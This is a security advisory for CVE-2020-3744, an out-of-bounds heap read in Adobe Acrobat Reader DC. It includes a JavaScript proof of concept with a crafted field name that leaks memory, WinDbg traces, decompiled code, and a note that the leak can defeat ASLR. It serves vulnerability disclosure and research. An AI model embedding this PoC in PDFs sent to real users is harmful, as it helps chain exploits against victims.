CVE-2020-3744
A specific JavaScript code embedded in a PDF file can lead to information leak when opening a PDF document in Adobe Acrobat Reader DC 2019.021.20048. With careful memory manipulation, this can lead to sensitive information disclose which could be abused when exploiting another vulnerability to bypass mitigations. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.
Adobe Acrobat Reader DC 2019.021.20048
6.8 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:H
CWE-122: Heap-based Buffer Overflow
Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.
Adobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and poses additional attack surface. Javascript API allows creation of additional field and a field name length calculation error can result in out of bounds memory being read. Javascript code that triggers this vulnerability is as follows:
this.addField( Array(0x20000-9).join("a") + "\." + "bbbb", "radiobutton", 0, [0,0,0,0] );
var s = getNthFieldName(0);
console.println(s.length);
var sh = "";
try{
for(var j = 0 ; j < s.length; j++){
if(s.charCodeAt(j) == 0x61 || s.charCodeAt(j) == 0x62 ) continue;
sh += ""+s.charCodeAt(j).toString(16);
}
}catch(e){}
The above code creates a PDF form field with a specific, large, name. Then, when getting the field name, out of bounds memory is leaked and printed. Note that, in general, this won’t cause a crash as it will just read out of bounds memory. Also, since the length of the printed field is determined by null termination, if the first byte of leaked memory happens to be null, no bytes will be leaked. To observe the crash, PageHeap needs to be enabled. In that case we observe the following:
(1ac8.1e8c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=52bf0ff6 ebx=0000ffff ecx=0000fff6 edx=0000ffff esi=52be1000 edi=52c49009
eip=66602e8e esp=00d9c964 ebp=00d9c998 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010203
VCRUNTIME140!memcpy+0x4e:
66602e8e f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
0:000> dd esi
52be1000 ???????? ???????? ???????? ????????
52be1010 ???????? ???????? ???????? ????????
52be1020 ???????? ???????? ???????? ????????
52be1030 ???????? ???????? ???????? ????????
52be1040 ???????? ???????? ???????? ????????
52be1050 ???????? ???????? ???????? ????????
52be1060 ???????? ???????? ???????? ????????
52be1070 ???????? ???????? ???????? ????????
0:000> dd edi
52c49009 61616161 61616161 61616161 61616161
52c49019 61616161 c0616161 c0c0c0c0 c0c0c0c0
52c49029 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49039 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49049 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49059 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49069 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49079 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0:000> ?ecx
Evaluate expression: 65526 = 0000fff6
0:000> kv 5
# ChildEBP RetAddr Args to Child
00 00d9c968 65964583 52c49000 52be0ff7 0000ffff VCRUNTIME140!memcpy+0x4e (FPO: [3,0,2]) (CONV: cdecl) [d:\agent\_work\3\s\src\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 194]
WARNING: Stack unwind information not available. Following frames may be wrong.
01 00d9c998 65a13ff9 4c13cfe8 4c09cfe8 0001fff7 AcroForm!DllUnregisterServer+0x26d73
02 00d9c9ec 65a1308a 00d9ca9c 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
03 00d9cab4 659a4b22 4a580fe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
04 00d9cb38 658fa7a0 1d168bd8 4a580fe8 49330ff0 AcroForm!DllUnregisterServer+0x67312
Above debugger output shows a crash during a memcpy
call. The crash is due to invalid memory read access violation (as esi
points out of bounds) and it shows that edi
is still valid. Counter ecx
also shows that there are 0xfff6 bytes to be copied. To understand what is going on, we need to take a step back to a calling function sub_20AA4483
:
if ( srcObj->_obj_type_ == eUNICODE )
{
if ( start_offset1 < pstrend && !(copy_size & 1) )
{
realloc_sub_2086737B(destObj, pstrend - start_offset1 + 5);
*destObj->strbuf = 0xFE;
destObj->strbuf[1] = 0xFF;
destObj->current_length = copy_size + 2;
memcpy(destObj->strbuf + 2, &srcObj->strbuf[start_offset], copy_size);
memset(&destObj->strbuf[destObj->current_length], 0, 2u);
}
}
else
{
realloc_sub_2086737B(destObj, pstrend - start_offset1 + 2);
destObj->current_length = copy_size;
memcpy(destObj->strbuf, &srcObj->strbuf[start_offset], copy_size);
memset(&destObj->strbuf[destObj->current_length], 0, 1u);
}
In the above, we can see that if the string type is not unicode, the code proceeds to reallocate the necessary memory buffer in the destination object and then proceeds to memcpy
the source string into it, and even properly null terminates it. Two things influence this vulnerable memcpy
call. Variable start_offset
and copy_size
. Both start_offset
and copy_size
are influenced by this function’s arguments. Taking one step backwards to the calling function reveals the following simplified code of function sub_20B53CC7
:
dotOffset = memchar__sub_20AA38A7(srcObj, '.', 1);
if ( dotOffset == -1 ){...}
else
{
...
sub_20AA4483(dstObj, srcObj, 0, dotOffset);
...
sub_20AA4483(dstObj, srcObj, dotOffset + 1, 0xFFFF);
}
In the above, we see two subsequent calls to function sub_20AA4483
that ends up calling mempcy
in a vulnerable way. But first, we see a call to a memchr
-like function that searches the source string for a .
character. This is significant because Adobe AcroForms specification tells us that forms and fields can have hierarchy trees which can be represented by .
delimited names. Function sub_20B53CC7
is actually recursively walking the field name and splitting the names by dots. The above is significant to this vulnerability because the last call of function sub_20AA4483
, which is processing the leaf part of the field name, has a correct dot offset, but a constant size parameter of 0xFFFF. These two end up affecting our variables start_offset
(which is exactly the same as dot offset) and copy_size
(which depends on the bytes copied so far AND constant 0xFFFF).
Additionally, string representation in memory in this case is as follows:
struct fname_string {
int obj_type,
char *strbuff,
size_t current_length,
size_t buffer_size
}
Object type identifies unicode vs ANSI strings, strbuff
points the the beginning of the string, while the buffer size is the size of total memory allocation and current_length
represents how much of that buffer is currently used. When we examine one of those objects in memory, we can see :
0:000> dd 4c09cfe8
4c09cfe8 00000001 52bc1000 0001fffb 00020000
4c09cff8 00000000 00000000 ???????? ????????
4c09d008 ???????? ???????? ???????? ????????
4c09d018 ???????? ???????? ???????? ????????
4c09d028 ???????? ???????? ???????? ????????
4c09d038 ???????? ???????? ???????? ????????
4c09d048 ???????? ???????? ???????? ????????
4c09d058 ???????? ???????? ???????? ????????
0:000> dd 52bc1000
52bc1000 61616161 61616161 61616161 61616161
52bc1010 61616161 61616161 61616161 61616161
52bc1020 61616161 61616161 61616161 61616161
52bc1030 61616161 61616161 61616161 61616161
52bc1040 61616161 61616161 61616161 61616161
52bc1050 61616161 61616161 61616161 61616161
52bc1060 61616161 61616161 61616161 61616161
52bc1070 61616161 61616161 61616161 61616161
For the above example, 0x20000 is the total buffer size, 0x1fffb is current string length and 0x52bc1000 is the string pointer. We can conclude that for very large strings, Acrobat actually allocates buffers in multiples of 0x10000 or 64kb. Note that 0xFFFF constant is just one byte shy of 0x10000.
Now, getting back to the vulnerable memcpy
call, we need to determine where the copy_size
value is calculated. This calculation happens in in a couple of steps, but the most significant part is in function sub_208720F2
which is calculating an offset into the string taking account of the string type. This function returns the offset that is supposed to limit copy_size
, but due to an integer overflow, a bigger value is returned. This essentially results in constant 0xFFFF being added to the current string offset. In most cases, since large strings are allocated in multiples of 0x10000 bytes, this overflow doesn’t cause a problem, but with specially constructed field names we can force a boundary condition which can lead to up to 0xFFFE bytes being read out of bounds. The string constructed in our PoC does just that:
Array(0x20000-9).join("a") + "\." + "bbbb"
It makes sure a 0x20000 bytes long chunk of memory is allocated, but makes it almost full. If we break the process just before the memcpy
we can expect the parameters:
eax=52128ff7 ebx=0000ffff ecx=65727471 edx=00000040 esi=4b784fe8 edi=4b888fe8
eip=6596457e esp=0053c86c ebp=0053c894 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroForm!DllUnregisterServer+0x26d6e:
6596457e e8aaa8dbff call AcroForm+0x5ee2d (6571ee2d)
0:000> kv 4
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0053c894 65a13ff9 4b784fe8 4b888fe8 0001fff7 AcroForm!DllUnregisterServer+0x26d6e
01 0053c8e8 65a1308a 0053c998 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
02 0053c9b0 659a4b22 4915cfe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
03 0053ca34 658fa7a0 1c20abd8 4915cfe8 4910cff0 AcroForm!DllUnregisterServer+0x67312
0:000> dd esp
0053c86c 52241000 52128ff7 0000ffff 4b784fe8
0053c87c 00010000 0000000d c0010000 4b784fe8
0053c88c 0001fff7 0002fff6 0053c8e8 65a13ff9
0053c89c 4b784fe8 4b888fe8 0001fff7 0000ffff
0053c8ac c0010000 0000000b 00000056 c0010000
0053c8bc 0000000d 0000000b c0010000 491d4fb0
0053c8cc 491d4fb0 670544f0 00000013 80010000
0053c8dc 0001fff6 4b784fe8 00000014 0053c9b0
The first parameter, destination buffer, is big enough:
0:000> !heap -p -a poi(esp)
address 52241000 found in
_DPH_HEAP_ROOT @ 761000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
4f1b39f4: 52241000 20000 - 52240000 22000
6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
77c92953 ntdll!RtlReAllocateHeap+0x00000043
77552620 ucrtbase!_realloc_base+0x00000030
66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
657279ba AcroForm!PlugInMain+0x0000769a
65727451 AcroForm!PlugInMain+0x00007131
65964570 AcroForm!DllUnregisterServer+0x00026d60
65a13ff9 AcroForm!DllUnregisterServer+0x000d67e9
65a1308a AcroForm!DllUnregisterServer+0x000d587a
659a4b22 AcroForm!DllUnregisterServer+0x00067312
658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90
0:000> ?poi(esp+4) - 52109000
Evaluate expression: 131063 = 0001fff7
Second parameter already starts at a large offset from its beginning (0x0001fff7 actually), and is of the same size.
0:000> !heap -p -a poi(esp+4)
address 52128ff7 found in
_DPH_HEAP_ROOT @ 761000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
4ecb2c30: 52109000 20000 - 52108000 22000
unknown!fillpattern
6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
77c92953 ntdll!RtlReAllocateHeap+0x00000043
77552620 ucrtbase!_realloc_base+0x00000030
66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
657279ba AcroForm!PlugInMain+0x0000769a
65727451 AcroForm!PlugInMain+0x00007131
65727723 AcroForm!PlugInMain+0x00007403
657276d4 AcroForm!PlugInMain+0x000073b4
65a12f1f AcroForm!DllUnregisterServer+0x000d570f
659a4b22 AcroForm!DllUnregisterServer+0x00067312
658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90
And finally, the size of the copy is 0xFFFF.
0:000> ?poi(esp+8)
Evaluate expression: 65535 = 0000ffff
Executing this memcpy
call results in 0xFFF8
bytes being read out of bounds into the destination string. This destination string is later used as part of a field name and can be inspected via Javascript, thus leaking heap metadata.
By carefully controlling the allocations prior to and after the source string, we can put other sensitive process information in the suitable memory position and then leak it through this vulnerability. This can be used to break ASLR and other mitigations.
2019-11-26 - Vendor Disclosure
2020-02-11 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.